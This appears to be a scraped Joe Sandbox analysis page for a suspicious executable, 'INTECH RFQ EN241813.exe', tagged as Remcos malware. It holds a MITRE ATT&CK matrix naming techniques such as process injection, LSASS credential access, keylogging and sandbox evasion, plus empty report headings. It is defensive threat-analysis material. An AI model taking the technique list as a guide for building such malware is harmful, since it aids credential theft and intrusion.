Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	11 Input Capture	11 Security Software Discovery	Remote Services	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	Logon Script (Windows)	412 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	112 Application Layer Protocol	Data Transfer Size Limits	Service Stop

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INTECH RFQ EN241813.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
INTECH RFQ EN241813.exe